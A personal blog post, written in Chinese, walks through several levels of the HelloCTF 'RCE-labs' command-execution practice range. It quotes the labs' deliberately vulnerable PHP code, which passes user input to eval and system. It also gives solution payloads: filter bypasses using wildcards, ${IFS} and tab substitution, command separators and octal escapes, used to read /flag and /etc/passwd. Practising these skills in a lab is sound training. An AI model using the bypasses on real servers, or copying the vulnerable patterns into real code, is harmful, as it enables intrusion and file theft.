<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"><meta name="author" content="syifna"><meta name="renderer" content="webkit"><meta name="copyright" content="syifna"><meta name="keywords" content="syifna~的博客"><meta name="description" content=""><meta name="Cache-Control" content="no-cache"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>RCE-labs · syifna's Blog</title><link rel="stylesheet" href="/css/style.css?v=2018.7.9"><link rel="stylesheet" href="/css/animation.css?v=2018.7.9"><link rel="icon" href="/img/assets/favicon.ico"><link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css?version=1.5.6"><!-- scripts--><script>(function( w ){
  "use strict";
  // rel=preload support test
  if( !w.loadCSS ){
    w.loadCSS = function(){};
  }
  // define on the loadCSS obj
  var rp = loadCSS.relpreload = {};
  // rel=preload feature support test
  // runs once and returns a function for compat purposes
  rp.support = (function(){
    var ret;
    try {
      ret = w.document.createElement( "link" ).relList.supports( "preload" );
    } catch (e) {
      ret = false;
    }
    return function(){
      return ret;
    };
  })();

  // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
  // then change that media back to its intended value on load
  rp.bindMediaToggle = function( link ){
    // remember existing media attr for ultimate state, or default to 'all'
    var finalMedia = link.media || "all";

    function enableStylesheet(){
      link.media = finalMedia;
    }

    // bind load handlers to enable media
    if( link.addEventListener ){
      link.addEventListener( "load", enableStylesheet );
    } else if( link.attachEvent ){
      link.attachEvent( "onload", enableStylesheet );
    }

    // Set rel and non-applicable media type to start an async request
    // note: timeout allows this to happen async to let rendering continue in IE
    setTimeout(function(){
      link.rel = "stylesheet";
      link.media = "only x";
    });
    // also enable media after 3 seconds,
    // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
    setTimeout( enableStylesheet, 3000 );
  };

  // loop through link elements in DOM
  rp.poly = function(){
    // double check this to prevent external calls from running
    if( rp.support() ){
      return;
    }
    var links = w.document.getElementsByTagName( "link" );
    for( var i = 0; i < links.length; i++ ){
      var link = links[ i ];
      // qualify links to those with rel=preload and as=style attrs
      if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
        // prevent rerunning on link
        link.setAttribute( "data-loadcss", true );
        // bind listeners to toggle media back
        rp.bindMediaToggle( link );
      }
    }
  };

  // if unsupported, run the polyfill
  if( !rp.support() ){
    // run once at least
    rp.poly();

    // rerun poly on an interval until onload
    var run = w.setInterval( rp.poly, 500 );
    if( w.addEventListener ){
      w.addEventListener( "load", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    } else if( w.attachEvent ){
      w.attachEvent( "onload", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    }
  }


  // commonjs
  if( typeof exports !== "undefined" ){
    exports.loadCSS = loadCSS;
  }
  else {
    w.loadCSS = loadCSS;
  }
}( typeof global !== "undefined" ? global : this ) );</script><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" defer></script><script src="/js/main.js?v=2018.7.9" defer></script><!-- fancybox--><link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"><script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script><!-- busuanzi--><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><meta name="generator" content="Hexo 7.3.0"></head><body><section class="profile-close" id="cxo-profile"><div class="profile-avatar"><i class="fa fa-caret-left"></i><img src="/img/assets/cat.png"></div><!--.profile-saying
  i.fa.fa-comment
  .saying--><div class="cxo-profile-inner"><div class="profile-name">longlongyu</div><div class="profile-signature">for me</div><div class="friends"><div>FRIENDS</div><span><a href="//github.com/Longlongyu" target="_black">friendA</a></span><span><a href="//github.com/" target="_black">friendB</a></span><span><a href="//github.com/" target="_black">friendC</a></span></div><div class="read-progress"></div></div></section><header id="cxo-intro" style="height: 70vh;background-image: url(/img/intro/index-bg.png);"><nav id="cxo-intro-nav"><section><div class="intro-nav-title"><a href="/">syifna's Blog</a></div><div class="intro-nav-label-box"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div><i class="fa fa-bars intro-nav-menu"><div class="intro-nav-drop"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div></i><div class="clear"></div></section></nav><h1 class="post-title">RCE-labs</h1><div class="post-intros"><div class="post-intro-meta"><span class="post-intro-time"><i class="post-intro-calendar fa fa-calendar"></i><span>2025-05-19</span></span></div></div></header><article class="cxo-up" id="cxo-content-outer"><section id="cxo-content-inner"><article class="article-entry" id="post"><h2 id="level2"><a href="#level2" class="headerlink" title="level2"></a>level2</h2><h3 id="PHP代码执行函数"><a href="#PHP代码执行函数" class="headerlink" title="PHP代码执行函数"></a>PHP代码执行函数</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_39934520/article/details/109231480">PHP中常见的命令执行函数与代码执行函数_命令执行类似eval的有那些函数-CSDN博客</a></p>
<h2 id><a href="#" class="headerlink" title></a></h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">include</span> (<span class="string">&quot;get_flag.php&quot;</span>);</span><br><span class="line"><span class="keyword">global</span> <span class="variable">$flag</span>;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">session_start</span>(); <span class="comment">// 开启 session</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Author</span>: 探姬</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Date</span>:   2024-08-11 14:34</span></span><br><span class="line"><span class="comment"># <span class="doctag">@Repo</span>:   github.com/ProbiusOfficial/RCE-labs</span></span><br><span class="line"><span class="comment"># <span class="doctag">@email</span>:  admin<span class="doctag">@hello</span>-ctf.com</span></span><br><span class="line"><span class="comment"># <span class="doctag">@link</span>:   hello-ctf.com</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">--- HelloCTF - RCE靶场 : PHP代码执行函数 --- </span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">除开在一句话木马中最受欢迎用以直接执行PHP代码的 eval() 函数，PHP还有许多 回调函数 也可以直接或者间接的执行PHP代码。</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">在该关卡中，你将会从能够执行代码的PHP函数中抽取一个，你需要填充函数的内容来执行某些代码以获取flag（tip:flag存储在 $flag 中,当然你也可以尝试其他方法）。</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">hello_ctf</span>(<span class="params"><span class="variable">$function</span>, <span class="variable">$content</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">global</span> <span class="variable">$flag</span>;</span><br><span class="line">    <span class="variable">$code</span> = <span class="variable">$function</span> . <span class="string">&quot;(&quot;</span> . <span class="variable">$content</span> . <span class="string">&quot;);&quot;</span>;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;Your Code: <span class="subst">$code</span> &lt;br&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">eval</span>(<span class="variable">$code</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="comment">//hello_ctf(&#x27;echo&#x27;, &#x27;$flag&#x27;);</span></span><br><span class="line"><span class="comment">// 生成: echo($flag);</span></span><br><span class="line"><span class="comment">// 输出 flag 内容</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_fun</span>(<span class="params"></span>)</span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="variable">$func_list</span> = [<span class="string">&#x27;eval&#x27;</span>,<span class="string">&#x27;assert&#x27;</span>,<span class="string">&#x27;call_user_func&#x27;</span>,<span class="string">&#x27;create_function&#x27;</span>,<span class="string">&#x27;array_map&#x27;</span>,<span class="string">&#x27;call_user_func_array&#x27;</span>,<span class="string">&#x27;usort&#x27;</span>,<span class="string">&#x27;array_filter&#x27;</span>,<span class="string">&#x27;array_reduce&#x27;</span>,<span class="string">&#x27;preg_replace&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!<span class="keyword">isset</span>(<span class="variable">$_SESSION</span>[<span class="string">&#x27;random_func&#x27;</span>])) &#123;</span><br><span class="line">        <span class="variable">$_SESSION</span>[<span class="string">&#x27;random_func&#x27;</span>] = <span class="variable">$func_list</span>[<span class="title function_ invoke__">array_rand</span>(<span class="variable">$func_list</span>)];</span><br><span class="line">    &#125;</span><br><span class="line"> <span class="comment">//随机选择一个函数并存入会话</span></span><br><span class="line">    </span><br><span class="line">    <span class="variable">$random_func</span> = <span class="variable">$_SESSION</span>[<span class="string">&#x27;random_func&#x27;</span>];</span><br><span class="line"></span><br><span class="line">    <span class="variable">$url_fucn</span> = <span class="title function_ invoke__">preg_replace</span>(<span class="string">&#x27;/_/&#x27;</span>, <span class="string">&#x27;-&#x27;</span>, <span class="variable">$_SESSION</span>[<span class="string">&#x27;random_func&#x27;</span>]);</span><br><span class="line"> <span class="comment">//生成文本链接</span></span><br><span class="line">    <span class="keyword">echo</span> <span class="string">&quot;获得新的函数: <span class="subst">$random_func</span> ，去 https://www.php.net/manual/zh/function.&quot;</span>.<span class="variable">$url_fucn</span>.<span class="string">&quot;.php 查看函数详情。&lt;br&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> <span class="variable">$_SESSION</span>[<span class="string">&#x27;random_func&#x27;</span>];</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">start</span>(<span class="params"><span class="variable">$act</span></span>)</span>&#123;</span><br><span class="line"></span><br><span class="line">    <span class="variable">$random_func</span> = <span class="title function_ invoke__">get_fun</span>();</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span>(<span class="variable">$act</span> == <span class="string">&quot;r&quot;</span>)&#123; <span class="comment">/* 通过发送GET ?action=r 的方式可以重置当前选中的函数 —— 或者你可以自己想办法可控它x */</span></span><br><span class="line">        <span class="title function_ invoke__">session_unset</span>();</span><br><span class="line">        <span class="title function_ invoke__">session_destroy</span>(); </span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (<span class="variable">$act</span> == <span class="string">&quot;submit&quot;</span>)&#123;</span><br><span class="line">        <span class="variable">$user_content</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;content&#x27;</span>]; </span><br><span class="line">        <span class="title function_ invoke__">hello_ctf</span>(<span class="variable">$random_func</span>, <span class="variable">$user_content</span>);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;action&#x27;</span>]) ? <span class="title function_ invoke__">start</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;action&#x27;</span>]) : <span class="string">&#x27;&#x27;</span>;</span><br></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Get</span><br><span class="line">?action=submit</span><br><span class="line">Post</span><br><span class="line">content=system(&#x27;ls /&#x27;)</span><br><span class="line">content=system(&#x27;cat /flag&#x27;)</span><br></pre></td></tr></table></figure>







<h2 id="level6"><a href="#level6" class="headerlink" title="level6"></a>level6</h2><h3 id="通配符匹配绕过"><a href="#通配符匹配绕过" class="headerlink" title="通配符匹配绕过"></a>通配符匹配绕过</h3><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_56059226/article/details/119950112">RCE通配符绕过-CSDN博客</a></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">hello_shell</span>(<span class="params"><span class="variable">$cmd</span></span>)</span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">preg_match</span>(<span class="string">&quot;/[b-zA-Z_@#%^&amp;*:&#123;&#125;\-\+&lt;&gt;\&quot;|`;\[\]]/&quot;</span>, <span class="variable">$cmd</span>))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&quot;WAF!&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="title function_ invoke__">system</span>(<span class="variable">$cmd</span>);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]) ? <span class="title function_ invoke__">hello_shell</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]) : <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="keyword">__FILE__</span>);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>没有过滤a</p>
<p>通配符构造</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?cmd=/???/?a? /??a?   (/bin/cat flag)</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h2 id="level7"><a href="#level7" class="headerlink" title="level7"></a>level7</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">function hello_shell($cmd)&#123;</span><br><span class="line">    if(preg_match(&quot;/flag| /&quot;, $cmd))&#123;</span><br><span class="line">        die(&quot;WAF!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    system($cmd);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">isset($_GET[&#x27;cmd&#x27;]) ? hello_shell($_GET[&#x27;cmd&#x27;]) : null;</span><br><span class="line"></span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=cat%09/f*</span><br></pre></td></tr></table></figure>





<h3 id="空格过滤"><a href="#空格过滤" class="headerlink" title="空格过滤"></a>空格过滤</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">在bash下可以用`$IFS`、`$&#123;IFS&#125;`、`$IFS$9`、`%09`、`&lt;`、`&gt;`、`&lt;&gt;`、`%2C`（例如 &lt;code&gt;&#123;cat%2C%2Fetc%2Fpasswd&#125;&lt;/code&gt;）、空格或tab分隔符，与SQL注入类似，用`/**/`注释也能绕过。</span><br></pre></td></tr></table></figure>

<ol>
<li><strong>内部字段分隔符(IFS) 绕过</strong></li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># 标准空格</span><br><span class="line">cat /etc/passwd</span><br><span class="line"></span><br><span class="line"># 使用IFS变量替代</span><br><span class="line">cat$&#123;IFS&#125;/etc/passwd</span><br><span class="line">cat$IFS/etc/passwd</span><br><span class="line">cat$&#123;IFS&#125;$9/etc/passwd  # $9是空参数</span><br></pre></td></tr></table></figure>

<p>2.<strong>特殊字符替代</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"># 使用重定向符号</span><br><span class="line">cat&lt;/etc/passwd</span><br><span class="line">cat&gt;file&lt;/etc/passwd</span><br><span class="line"></span><br><span class="line"># 使用花括号（无空格）</span><br><span class="line">&#123;cat,/etc/passwd&#125;</span><br><span class="line"></span><br><span class="line"># 使用通配符（某些环境下）</span><br><span class="line">cat/etc[/]passwd</span><br></pre></td></tr></table></figure>

<p>3.<strong>编码绕过</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># URL编码</span><br><span class="line">cat%20/etc/passwd    # %20=空格</span><br><span class="line">cat%09/etc/passwd    # %09=Tab</span><br><span class="line"></span><br><span class="line"># 十六进制编码</span><br><span class="line">cat$&#x27;\x20&#x27;/etc/passwd</span><br></pre></td></tr></table></figure>

<ol start="4">
<li><strong>注释绕过</strong></li>
</ol>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat/**//etc/passwd</span><br><span class="line">cat/xxx/etc/passwd   # 使用不存在的目录名</span><br></pre></td></tr></table></figure>

<p>5.<strong>变量拼接</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">X=/etc/passwd;cat$X</span><br><span class="line">cmd=&quot;cat /etc/passwd&quot;;$cmd</span><br></pre></td></tr></table></figure>

<p>6.<strong>特殊符号组合</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">cat&lt;&lt;&lt;$(&lt;/etc/passwd)</span><br><span class="line">cat&lt;&lt;EOL</span><br><span class="line">/etc/passwd</span><br><span class="line">EOL</span><br></pre></td></tr></table></figure>





<h2 id="level8"><a href="#level8" class="headerlink" title="level8"></a>level8</h2><h3 id="文件描述和重定向"><a href="#文件描述和重定向" class="headerlink" title="文件描述和重定向"></a>文件描述和重定向</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">/*</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"># @Author: 探姬</span><br><span class="line"># @Date:   2024-08-11 14:34</span><br><span class="line"># @Repo:   github.com/ProbiusOfficial/RCE-labs</span><br><span class="line"># @email:  admin@hello-ctf.com</span><br><span class="line"># @link:   hello-ctf.com</span><br><span class="line"></span><br><span class="line">--- HelloCTF - RCE靶场 : 命令执行 - 重定向 --- </span><br><span class="line"></span><br><span class="line">大多数 UNIX 系统命令从你的终端接受输入并将所产生的输出发送回​​到您的终端。一个命令通常从一个叫标准输入的地方读取输入，默认情况下，这恰好是你的终端。同样，一个命令通常将其输出写入到标准输出，默认情况下，这也是你的终端 —— 这些是命令有回显的基础。</span><br><span class="line"></span><br><span class="line">如果希望执行某个命令，但又不希望在屏幕上显示输出结果，那么可以将输出重定向到 /dev/null：</span><br><span class="line">$ command &gt; /dev/null</span><br><span class="line"></span><br><span class="line">/dev/null 是一个特殊的文件，写入到它的内容都会被丢弃；如果尝试从该文件读取内容，那么什么也读不到。但是 /dev/null 文件非常有用，将命令的输出重定向到它，会起到&quot;禁止输出&quot;的效果。</span><br><span class="line">如果希望屏蔽 stdout 和 stderr，可以这样写：</span><br><span class="line">$ command &gt; /dev/null 2&gt;&amp;1</span><br><span class="line"></span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">function hello_shell($cmd)&#123;</span><br><span class="line">    /*&gt;/dev/null 将不会有任何回显，但会回显错误，加上 2&gt;&amp;1 后连错误也会被屏蔽掉*/</span><br><span class="line">    system($cmd.&quot;&gt;/dev/null 2&gt;&amp;1&quot;);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">isset($_GET[&#x27;cmd&#x27;]) ? hello_shell($_GET[&#x27;cmd&#x27;]) : null;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=cat /f* ||</span><br></pre></td></tr></table></figure>

<h4 id="分隔符"><a href="#分隔符" class="headerlink" title="分隔符"></a>分隔符</h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">; //分号</span><br><span class="line">| //只执行后面那条命令</span><br><span class="line">|| //只执行前面那条命令</span><br><span class="line">&amp; //两条命令都会执行</span><br><span class="line">&amp;&amp; //两条命令都会执行</span><br><span class="line">----&gt;&amp;的url编码为%26.使用&amp;时必须进行编码，不然会被解析成传入参数间的分隔符</span><br></pre></td></tr></table></figure>





<h2 id="level9"><a href="#level9" class="headerlink" title="level9"></a>level9</h2><h3 id="bash终端的无字母命令执行-八进制转义"><a href="#bash终端的无字母命令执行-八进制转义" class="headerlink" title="bash终端的无字母命令执行_八进制转义"></a>bash终端的无字母命令执行_八进制转义</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br></pre></td><td class="code"><pre><span class="line">/*</span><br><span class="line"># -*- coding: utf-8 -*-</span><br><span class="line"># @Author: 探姬</span><br><span class="line"># @Date:   2024-08-11 14:34</span><br><span class="line"># @Repo:   github.com/ProbiusOfficial/RCE-labs</span><br><span class="line"># @email:  admin@hello-ctf.com</span><br><span class="line"># @link:   hello-ctf.com</span><br><span class="line"></span><br><span class="line">--- HelloCTF - RCE靶场 : 命令执行 - bash终端的无字母命令执行_八进制转义 ---</span><br><span class="line"></span><br><span class="line">题目已经拥有成熟脚本：https://github.com/ProbiusOfficial/bashFuck</span><br><span class="line">你也可以使用在线生成：https://probiusofficial.github.io/bashFuck/</span><br><span class="line">题目本身也提供一个/exp.php方便你使用</span><br><span class="line"></span><br><span class="line">从该关卡开始你会发现我们在Dockerfile中添加了一行改动：</span><br><span class="line"></span><br><span class="line">RUN ln -sf /bin/bash /bin/sh</span><br><span class="line"></span><br><span class="line">这是由于在PHP中，system是执行sh的，sh通常只是一个软连接，并不是真的有一个shell叫sh。在debian系操作系统中，sh指向dash；在centos系操作系统中，sh指向bash，我们用的底层镜像 php:7.3-fpm-alpine 默认指向的 /bin/busybox ，要验证这一点，你可以对 /bin/sh 使用 ls -l 命令查看，在这个容器中，你会得到下面的回显：</span><br><span class="line">bash-5.1# ls -l /bin/sh</span><br><span class="line">lrwxrwxrwx    1 root     root            12 Mar 16  2022 /bin/sh -&gt; /bin/busybox</span><br><span class="line"></span><br><span class="line">我们需要用到的特性只有bash才支持，请记住这一点，这也是我们手动修改指向的原因。</span><br><span class="line"></span><br><span class="line">在这个关卡主要利用的是在终端中，$&#x27;\xxx&#x27;可以将八进制ascii码解析为字符，仅基于这个特性，我们可以将传入的命令的每一个字符转换为$&#x27;\xxx\xxx\xxx\xxx&#x27;的形式，但是注意，这种方式在没有空格的情况下无法执行带参数的命令。</span><br><span class="line">比如&quot;ls -l&quot;也就是$&#x27;\154\163\40\55\154&#x27; 只能拆分为$&#x27;\154\163&#x27; 空格 $&#x27;\55\154&#x27;三部分。</span><br><span class="line"></span><br><span class="line">bash-5.1# $&#x27;\154\163\40\55\154&#x27;</span><br><span class="line">bash: ls -l: command not found</span><br><span class="line"></span><br><span class="line">bash-5.1# $&#x27;\154\163&#x27; $&#x27;\55\154&#x27;</span><br><span class="line">total 4</span><br><span class="line">-rw-r--r--    1 www-data www-data       829 Aug 14 19:39 index.php</span><br><span class="line"></span><br><span class="line">*/</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">function hello_shell($cmd)&#123;</span><br><span class="line">    if(preg_match(&quot;/[A-Za-z\&quot;%*+,-.\/:;=&gt;?@[\]^`|]/&quot;, $cmd))&#123;</span><br><span class="line">        die(&quot;WAF!&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    system($cmd);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">isset($_GET[&#x27;cmd&#x27;]) ? hello_shell($_GET[&#x27;cmd&#x27;]) : null;</span><br></pre></td></tr></table></figure>

<p>$’\xxx’可以将八进制ascii码解析为字符，仅基于这个特性，我们可以将传入的命令的每一个字符转换为$’\xxx\xxx\xxx\xxx’的形式，但是注意，这种方式在没有空格的情况下无法执行带参数的命令。<br>比如”ls -l”也就是$’\154\163\40\55\154’ 只能拆分为$’\154\163’ 空格 $’\55\154’三部分。</p>
<p>无字母rce</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?cmd=$&#x27;\143\141\164&#x27; $&#x27;\057\146\154\141\147&#x27;</span><br></pre></td></tr></table></figure>







<h2 id="level10"><a href="#level10" class="headerlink" title="level10"></a>level10</h2><h3 id="bash终端的无字母命令执行-二进制整数替换"><a href="#bash终端的无字母命令执行-二进制整数替换" class="headerlink" title="bash终端的无字母命令执行_二进制整数替换"></a>bash终端的无字母命令执行_二进制整数替换</h3><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/F07on3/articles/18834568">RCE-labs-练习（上） - F0T0ne - 博客园</a></p>
